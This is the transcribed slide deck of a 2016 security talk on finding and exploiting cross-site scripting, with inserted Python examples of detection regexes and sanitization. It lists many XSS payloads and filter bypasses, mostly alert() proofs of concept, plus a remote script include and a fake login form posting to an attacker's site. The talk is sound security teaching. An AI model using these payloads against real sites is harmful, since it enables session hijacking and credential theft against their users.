Non-Esoteric XSS Tips & Tricks

Miroslav Štampar ([email protected]; [email protected])

Upload: miroslav-stampar

Post on 20-Mar-2017


TRANSCRIPT

Page 1: Non-Esoteric XSS Tips & Tricks

Non-Esoteric XSS Tips & Tricks

Miroslav Štampar

([email protected]; [email protected])

Page 2: Non-Esoteric XSS Tips & Tricks

FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 2

XSS (Cross-Site Scripting)

Injection attack against users of (otherwise) benign and trusted web sites

Used mostly in targeted attacks (e.g. spear-phishing against administrators)

For example, an attacker can send a link with malicious JavaScript (JS) code to an unsuspecting user

The user’s browser has no way to know that the link should not be trusted and will execute the JS blindly – effectively giving access to cookies, session tokens or other sensitive information within the browsing context

Page 3: Non-Esoteric XSS Tips & Tricks

Real-world (known) cases

Page 4: Non-Esoteric XSS Tips & Tricks

More about vulnerability

Considered a critical vulnerability, hence (often) well paid in bug bounty programs

Failure to (properly) sanitize/filter any of: <, >, ', " inside the response can introduce the vulnerability

While testing, responses to user-supplied values are inspected for signs of the vulnerability (e.g. response returning values in original form)

Provoking a JS pop-up box with a custom message (e.g. XSS) is universally accepted as a Proof of Concept (PoC) for existence of the vulnerability

Types: stored (persisting), reflected (temporary) and DOM-based (in-browser)

Page 5: Non-Esoteric XSS Tips & Tricks

Food for thought :)

Page 6: Non-Esoteric XSS Tips & Tricks

Testing workflow

1) Find reflecting input points (e.g. page's GET parameter values)

2) Recognize context of reflection (e.g. inside <script>...</script>)

3) Bypass sanitization/filtering and/or protection mechanism(s) (Note: if possible and/or required)

4) Write vulnerability exploitation PoC (e.g. ...alert('XSS')...)

Page 7: Non-Esoteric XSS Tips & Tricks

Practical example (PoC)

Page 8: Non-Esoteric XSS Tips & Tricks

Protection mechanism(s)

Common (XSS) detection regular expressions:

● /<[a-z]/i - (e.g.) <svg, <img - though, there are cases where “benign” tags such as <a> are left un-blacklisted

● /\b(java)?script\b/i - (e.g.) <script, <img src="javascript:, etc.

● /\bon\w+\s*=/i - (e.g.) <img src=null onerror=... - though, there are cases where <marquee's onstart( is left un-blacklisted

● /\bsrc\s*=/i - (e.g.) <embed src=..., etc.

● /\b\w+\(/i - (e.g.) alert( - though, there are cases where confirm( is left un-blacklisted
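As an added example (not code from the talk), the five patterns above transcribed into Python and run over constructed parameter values: it shows which rule fires on the slide's own samples and that the same rules also block benign input such as an <a> link, a parameter named online, or the text sin(x), which is the false-positive cost of blacklisting.

```python
import re

# The five detection patterns from the slide, transcribed as Python regexes
# (the slide's trailing /i flag becomes re.I).
DETECTION_RULES = {
    "tag_open":   re.compile(r"<[a-z]", re.I),
    "script":     re.compile(r"\b(java)?script\b", re.I),
    "on_handler": re.compile(r"\bon\w+\s*=", re.I),
    "src_attr":   re.compile(r"\bsrc\s*=", re.I),
    "func_call":  re.compile(r"\b\w+\(", re.I),
}

def matching_rules(value):
    """Names of the detection rules that fire on one parameter value, in slide order."""
    return [name for name, rx in DETECTION_RULES.items() if rx.search(value)]

def triage(values):
    """Split parameter values into flagged (with the rules hit) and passed."""
    flagged, passed = {}, []
    for v in values:
        hits = matching_rules(v)
        if hits:
            flagged[v] = hits
        else:
            passed.append(v)
    return flagged, passed

# Constructed sample values: the slide's own examples next to benign look-alikes.
SAMPLES = [
    "<svg onload=alert(/XSS/)>",          # slide example
    '<img src="javascript:alert(1)">',    # slide example
    '<a href="/help">help</a>',           # benign markup: blocked by the <[a-z] rule
    "online=true",                        # benign text: \bon\w+\s*= fires on "online="
    "sin(x)",                             # benign text: \b\w+\( fires on any call syntax
    "plain description text",             # passes: no \b before "script" in "description"
]

if __name__ == "__main__":
    flagged, passed = triage(SAMPLES)
    for v, hits in flagged.items():
        print(f"{v!r:40} -> {', '.join(hits)}")
    print("passed:", passed)
```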

Page 9: Non-Esoteric XSS Tips & Tricks

Sanitization mechanism(s)

Common (XSS) server response sanitizations:

● Removing all special characters - (e.g.) foo<'">bar → foobar

● Replacing with whitespace all special characters - (e.g.) foo<'">bar → foo bar

● HTML named entity encoding - (e.g.) foo<'">bar → foo&lt;&apos;&quot;&gt;bar

● HTML numeric code point encoding - (e.g.) foo<'">bar → foo&#60;&#39;&#34;&#62;bar

● Backslash escaping all special characters - (e.g.) foo<'">bar → foo\<\'\"\>bar (Note: <script>)

● Uppercase conversion - (e.g.) foo<'">bar → FOO'"BAR (combined with another mechanism(s))
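The six sanitizations above implemented in Python as an added example (not code from the talk) and run on the slide's own foo<'">bar sample; raw_angle_brackets is a constructed check that shows which mechanisms still leave a raw < or > in the response, which is why backslash escaping only makes sense inside a <script> string context.

```python
SPECIAL = "<>'\""   # the four characters slide 4 says must not reach the response as-is

def remove_special(s):
    # Removing all special characters: foo<'">bar -> foobar
    return "".join(c for c in s if c not in SPECIAL)

def blank_special(s):
    # Replacing special characters with whitespace; the browser collapses the
    # run of spaces, which is why the slide renders it as "foo bar".
    return "".join(" " if c in SPECIAL else c for c in s)

def named_entities(s):
    # HTML named entity encoding: foo<'">bar -> foo&lt;&apos;&quot;&gt;bar
    table = {"<": "&lt;", ">": "&gt;", "'": "&apos;", '"': "&quot;"}
    return "".join(table.get(c, c) for c in s)

def numeric_entities(s):
    # HTML numeric code point encoding: foo<'">bar -> foo&#60;&#39;&#34;&#62;bar
    return "".join(f"&#{ord(c)};" if c in SPECIAL else c for c in s)

def backslash_escape(s):
    # Backslash escaping: foo<'">bar -> foo\<\'\"\>bar
    # A backslash is an escape only inside a JavaScript string (<script> context);
    # in HTML markup it is an ordinary character, so < and > stay live.
    return "".join("\\" + c if c in SPECIAL else c for c in s)

def uppercase_strip_angles(s):
    # Uppercase conversion combined with dropping < and >: foo<'">bar -> FOO'"BAR
    return "".join(c for c in s if c not in "<>").upper()

MECHANISMS = {
    "remove": remove_special, "whitespace": blank_special,
    "named": named_entities, "numeric": numeric_entities,
    "backslash": backslash_escape, "uppercase": uppercase_strip_angles,
}

def sanitize(value, mechanism):
    return MECHANISMS[mechanism](value)

def raw_angle_brackets(sanitized):
    # Constructed check: does the output still carry a raw tag delimiter?
    return "<" in sanitized or ">" in sanitized

if __name__ == "__main__":
    for name in MECHANISMS:
        out = sanitize("foo<'\">bar", name)
        print(f"{name:10} {out!r:34} raw <> left: {raw_angle_brackets(out)}")
```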

Page 10: Non-Esoteric XSS Tips & Tricks

<tag...> (more)

Break-out of <tag...> context with > OR onXXX event handler injection

?vuln="><svg onload=alert(/XSS/)>

?vuln=" onclick="alert(/XSS/)

Usability is highly dependent on context and available <tag> events

(e.g.) Tags having visibility: hidden require breaking out of <tag...> context

Page 11: Non-Esoteric XSS Tips & Tricks

<tag...> (more)

Even though attacker's options inside <tag> are pretty narrowed (e.g. user interaction required), (ab)using CSS with style can help

?vuln=" onmouseover=alert(/XSS/) style="display: block; position: absolute; left: 0; top: 0; height: 10000px; width: 10000px; opacity: 0; cursor: default

Page 12: Non-Esoteric XSS Tips & Tricks

>...<

Injecting outside of <tag> context and/or scope (e.g. </script>...) requires unfiltered < and >

Proper “Content-type” (e.g. “text/html”) is required, as in all XSS (reflected) cases (e.g. “application/json” is of no interest)

?vuln=<img src=null onerror=alert(/XSS/)>

?vuln=<script>alert(/XSS/)</script>

Page 13: Non-Esoteric XSS Tips & Tricks

<!--...-->

Requires breaking-out of <!--...--> (i.e. HTML comment) context with -->

Common for (custom) sites with debugging support turned ON (e.g. returning used SQL query inside comment)

?vuln=--><svg onload=alert(/XSS/)>

As it explicitly requires usage of <tag> it is fairly common to end up as unexploitable (e.g. protections are trigger happy on occurrence(s) of <[a-zA-Z] inside parameter values)

Page 14: Non-Esoteric XSS Tips & Tricks

<frame ...>

Injecting custom <frame> OR onload event handler injection (preferred)

?vuln="><frame src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4

?vuln=" onload="alert(/XSS/)

Note: Non-<frame> tags can't be used because of <frameset> restrictions

Page 15: Non-Esoteric XSS Tips & Tricks

<iframe...>

Break-out of <iframe...> context OR onload event handler injection (preferred)

?vuln="></iframe><svg onload=alert(/XSS/)>

?vuln=" onload="alert(/XSS/)

Page 16: Non-Esoteric XSS Tips & Tricks

<input...>

Break-out of <input...> context with > OR onfocus event handler injection (preferred)

?vuln=1"><svg onload=alert(/XSS/)>

?vuln=1" autofocus onfocus="alert(/XSS/)

Page 17: Non-Esoteric XSS Tips & Tricks

<input type="hidden"...>

In hidden <input> cases, combined with inability to break-out of <input...> context (due to filtering of <>), regular onXXX event handler injection doesn't work

Though, accesskey attribute can be (ab)used to make the user-assisted XSS payload (Alt-Shift-<key>)

?vuln=" accesskey="X" onclick="alert( /XSS/)

Page 18: Non-Esoteric XSS Tips & Tricks

<script>...</script>

Break-out of <script>...</script> with </script> OR in-place JS injection (preferred)

?vuln=</script><svg onload=alert(/XSS/)>

?vuln=foobar');alert('XSS');var dummy=('

Common in third-party advertisement plugins

Note: In-place JS injection doesn't require <>, though it requires unfiltered ' or " in majority of cases (interpreter syntax checks)

Page 19: Non-Esoteric XSS Tips & Tricks

echo $_SERVER['PHP_SELF']

Common finding even on top sites and/or frameworks

Non-sanitized reference of current script's path

http://...php/"><svg onload="alert(/XSS/)

Not PHP-specific (though more common)

Note: JS injection in path often requires manual URL encoding of non-alphanumeric characters

Page 20: Non-Esoteric XSS Tips & Tricks

<meta>

Often overlooked, though easy to exploit

Top sites tend to utilize lots of metadata

?vuln="><script>alert(/XSS/)</script>

?vuln=0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" http-equiv="refresh

Page 21: Non-Esoteric XSS Tips & Tricks

<textarea> and <title>

Injection into <textarea> and <title> enclosings requires explicit (respective) closing tags (i.e. </textarea> and </title>)

Important to note because of automated scanners (majority don't check the context)

<style> is also problematic, though in case of Internet Explorer CSS expression can be (ab)used

?vuln=</textarea><svg onload=alert(/XSS/)>
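Recognizing the reflection context (step 2 of the testing workflow on slide 6) is what this slide says most automated scanners skip, and the same question decides which output encoding a defender has to apply. As an added example, not code from the talk, a hypothetical reflection_context helper that classifies where a benign marker lands in a response, treating <textarea>, <title>, <script> and <style> as raw-text elements that only their own closing tag ends:

```python
import re

RAW_TEXT_TAGS = ("script", "style", "textarea", "title")

def reflection_context(response, marker):
    """Classify the context of the first reflection of `marker` in `response`.
    Hypothetical helper written for this example; a heuristic, not a full HTML parser."""
    idx = response.find(marker)
    if idx < 0:
        return "not reflected"
    before = response[:idx]
    start = before.rfind("<!--")
    in_comment = start >= 0 and "-->" not in before[start:]
    # Raw-text elements swallow everything up to their own explicit closing tag,
    # so an open <textarea>/<title> means no tag injected here is parsed as markup.
    for tag in RAW_TEXT_TAGS:
        opens = [m.end() for m in re.finditer(r"<%s\b[^>]*>" % tag, before, re.I)]
        if opens and not re.search(r"</%s\s*>" % tag, before[opens[-1]:], re.I):
            if in_comment and start < opens[-1]:
                break          # the element itself sits inside an open HTML comment
            return tag
    if in_comment:
        return "comment"
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:                # an unfinished <tag ...: attribute territory
        tag_text = before[lt:]
        quote = None
        for ch in tag_text:    # track whether a quoted attribute value is still open
            if quote:
                if ch == quote:
                    quote = None
            elif ch in "\"'":
                quote = ch
        if quote:
            return f"attribute value ({quote}-quoted)"
        if re.search(r"=\s*[^\s\"']*$", tag_text):
            return "attribute value (unquoted)"
        return "tag"
    return "text"

if __name__ == "__main__":
    # Constructed responses reflecting a benign marker in the contexts the talk covers.
    M = "ZZREFLECTZZ"
    for page in (f'<input value="{M}">', f"<textarea>{M}</textarea>",
                 f"<!-- SELECT 1 WHERE q='{M}' -->", f"<p>{M}</p>"):
        print(f"{page!r:45} -> {reflection_context(page, M)}")
```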

Page 22: Non-Esoteric XSS Tips & Tricks

$_POST

Though not exploitable directly from a link (i.e. address bar), it is a perfectly valid attack point

Requires a malicious HTML document that has to be loaded inside the victim's web browser

Either a standalone HTML OR a link that points to the attacker's site hosting the HTML document

Page 23: Non-Esoteric XSS Tips & Tricks

Protection(s) bypasses (more)

<svg/onload=alert(/XSS/)>

prompt`XSS`

onerror=confirm;throw/XSS/;

document.write(String.fromCharCode(60, 115,99,114,105,112,116,62,97,...

[][(![]+[])[+[]]+([![]]+[][... // JSFuck

<SCRIPT SRC=//DOMAIN.COM/XSS.JS></SCRIPT>

<embed src=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cuM...

<object data=data:text/html;base64,...

<video/poster/onerror=alert(/XSS/)>

</i/style=left:ex\pression(alert('XSS'))>

Page 24: Non-Esoteric XSS Tips & Tricks

Protection(s) bypasses (more)

<iframe src=javascript:alert('XSS')>

<isindex type=submit formaction=&#106&#97&#118&#97&#115&#99&#114&#105&#112...

<isindex type=image src=null onerror=alert(/XSS/)>

<iframe/srcdoc=&lt;svg&sol;onload&equals;alert&lpar;&quot;XSS&quot;&rpar;&gt;>

<img src=null onerror=\u0061\u006c\u0065\u0072\u0074&lpar;&quot;\u0058\u0053\u0053&quot;&rpar;>

<body style=height:9999px onwheel=prompt(/XSS/)>

<marquee onstart=confirm(/XSS/)>

Page 25: Non-Esoteric XSS Tips & Tricks

p.s. HTML injection

In cases when JavaScript injection (i.e. XSS) is not possible, HTML injection is also a valid attack point – though, not as valuable

Most common scenario is the usage of protection mechanism(s), while lacking any sanitization/filtering whatsoever

“Evil link” scenario – (e.g.)

“Fake login” scenario – (e.g.) <form action="//www.attacker.com/steal.php">...

“Fake defacement” scenario – (e.g.) <h1>This site has been hacked by l33tcr3w</h1>

Page 26: Non-Esoteric XSS Tips & Tricks

p.p.s. Recommended resources

www.openbugbounty.org

html5sec.org

Page 27: Non-Esoteric XSS Tips & Tricks

Questions?